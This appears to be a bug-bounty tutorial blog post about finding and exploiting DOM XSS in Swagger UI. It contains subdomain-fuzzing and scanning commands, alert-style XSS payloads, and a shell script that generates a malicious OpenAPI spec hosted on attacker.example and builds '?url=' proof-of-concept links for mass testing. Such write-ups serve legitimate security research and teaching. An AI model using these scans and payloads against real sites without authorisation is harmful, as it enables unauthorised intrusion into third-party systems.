Exploiting Swagger UI DOM XSS Vulnerabilities: A Bug Bounty Success Story

Mustafa Adam Qamar El-Din recently uncovered two Swagger UI DOM XSS vulnerabilities, earning a well-deserved reward. Here’s a breakdown of his methodology, along with practical commands and techniques for replicating such findings.

Steps to Reproduce:

1. Subdomain Enumeration & Fuzzing

  • Fed the list of live subdomains to dirsearch over stdin and kept only 200 responses (no wordlist is passed here, so dirsearch's default wordlist is used):
    cat live-subs.txt | python3 dirsearch.py --stdin -i 200 -e php,bak,old,zip,tar.gz,txt,log,conf,json,asp,jsp,aspx,yml,yaml,rar
    
  • Discovered Swagger UI endpoints:
    – `https://api[.]example[.]com/swagger/index.html`
    – `https://prod[.]auth[.]example[.]com/swagger/index.html`

2. XSS Payload Execution

  • Leveraged payloads from this writeup.
  • Example payload (closes an attribute, then injects a script; Swagger UI DOM XSS typically reaches the DOM through a field of an attacker-supplied OpenAPI spec that the page is told to load, not through a parameter echoed directly into HTML):
    "><script>alert(document.domain)</script>
    
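The two steps above, plus the bash automation further down, as one added shell example (not code from the original post). It fingerprints a fetched Swagger UI index page, prints the bundle URLs so the tester can check the version by hand, emits the attacker-hosted spec that carries the payload, and builds the test URL. `attacker.example`, the `/swagger/index.html` path and the sample HTML are assumptions; the spec-loading route via the `url` query parameter is the classic Swagger UI DOM XSS path and is the one assumed here.

```shell
#!/bin/sh
# Added example, not code from the original post. Helpers for the Swagger UI
# DOM XSS workflow: fingerprint a fetched index page, list its assets, generate
# the attacker-hosted spec that carries the payload, and build the test URL.
# attacker.example and /swagger/index.html are placeholders (assumptions).

PAYLOAD='"><script>alert(document.domain)</script>'   # payload from the write-up

# is_swagger_ui BODY: exit 0 if the HTML looks like a Swagger UI index page.
# Swagger UI 3.x/4.x index pages carry this title and load swagger-ui-bundle.js.
is_swagger_ui() {
  printf '%s\n' "$1" | grep -qiE '<title>[^<]*swagger ui|swagger-ui-bundle\.js'
}

# swagger_assets BODY: print the swagger-ui script/stylesheet URLs, so the
# tester can fetch swagger-ui-bundle.js and read its version banner.
swagger_assets() {
  printf '%s\n' "$1" \
    | grep -oiE '(src|href)="[^"]*swagger-ui[^"]*"' \
    | sed -E 's/^[^"]*"//; s/"$//'
}

# malicious_spec: a minimal OpenAPI 3 document whose info.description holds the
# payload. Swagger UI renders description fields into the DOM; a build that does
# not sanitise them executes the script. Host this on a server you control.
malicious_spec() {
  cat <<EOF
openapi: 3.0.0
info:
  title: xss-test
  version: "1.0"
  description: '$PAYLOAD'
paths: {}
EOF
}

# poc_url BASE SPEC_URL: the Swagger UI page told to load an external spec via
# its url query parameter (configUrl is the other spec-loading parameter).
poc_url() {
  printf '%s?url=%s\n' "$1" "$2"
}

# scan HOSTS_FILE: fetch /swagger/index.html on each host and print the ones
# that serve Swagger UI. Serving Swagger UI is a lead, not a vulnerability:
# open the printed test URL in a browser and watch for the alert.
scan() {
  while IFS= read -r host; do
    [ -n "$host" ] || continue
    body=$(curl -sk --max-time 10 "https://$host/swagger/index.html") || continue
    if is_swagger_ui "$body"; then
      echo "Swagger UI found: https://$host/swagger/index.html"
      echo "  test URL: $(poc_url "https://$host/swagger/index.html" "https://attacker.example/spec.yaml")"
    fi
  done < "$1"
}

# Usage: save malicious_spec output as spec.yaml on attacker.example, then
#   scan live-subs.txt
```

Recent Swagger UI releases ignore query-string configuration unless the deployment enables it (the `queryConfigEnabled` option), so a spec that fails to load through `?url=` does not prove the page is safe; check the bundle version and the deployment's configuration as well.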

3. Custom Wordlist for Recon

You Should Know:

1. Advanced Fuzzing with FFUF

FUZZ is substituted into the hostname, so the wordlist must contain bare labels (api, prod, auth), not full hostnames; use -fs or -fc alongside -mc 200 if a wildcard DNS record makes every label resolve:

ffuf -w subdomain-labels.txt -u https://FUZZ.example.com -mc 200 -o results.json

2. Alternative XSS Payloads

An attribute-breakout variant for contexts where `<script>` is stripped or encoded; it is not specific to Swagger UI and only fires if the injected text lands inside an HTML attribute:

"onmouseover=alert(1)//

3. Automating with Bash

Reading the file with `while read` avoids word-splitting surprises, and the label says what the check actually establishes: the host serves Swagger UI, which is a lead rather than a confirmed vulnerability.

while IFS= read -r sub; do curl -sk --max-time 10 "https://$sub/swagger/index.html" | grep -q "Swagger UI" && echo "Swagger UI found: $sub"; done < subs.txt

4. Linux Tools for Recon

  • Subfinder (Subdomain discovery):
    subfinder -d example.com -o subs.txt
    
  • Gau (Fetching endpoints):
    gau example.com | grep "swagger"
    

5. Windows Command for Quick Checks

Select-String needs the response body, not the response object, so read the Content property:

(Invoke-WebRequest -Uri "https://api.example.com/swagger/index.html" -UseBasicParsing).Content | Select-String -Pattern "Swagger UI"

What Undercode Says:

Swagger UI remains a prime target for XSS because vulnerable builds render attacker-controlled spec content into the DOM without adequate sanitisation. Always test:
– The spec-loading URL parameters (?url= and ?configUrl=) pointed at a spec you host
– Spec fields that Swagger UI renders as text or markdown (info.description, parameter and operation descriptions)
– The API's own inputs (/user/<payload>) and any JSON that reflects them into a response consumed by the UI

Automate recon with Burp Suite, Nuclei, and custom scripts.

Prediction:

As API usage grows, Swagger UI XSS will remain a common low-hanging fruit. Expect more automation tools targeting misconfigured developer portals.

Expected Output:

  • Vulnerable Swagger UI endpoints
  • Successful XSS execution
  • Bug bounty report submission

Reported By: Wadgamaraldeen Tips – Hackers Feeds
Basic Verification: Pass ✅
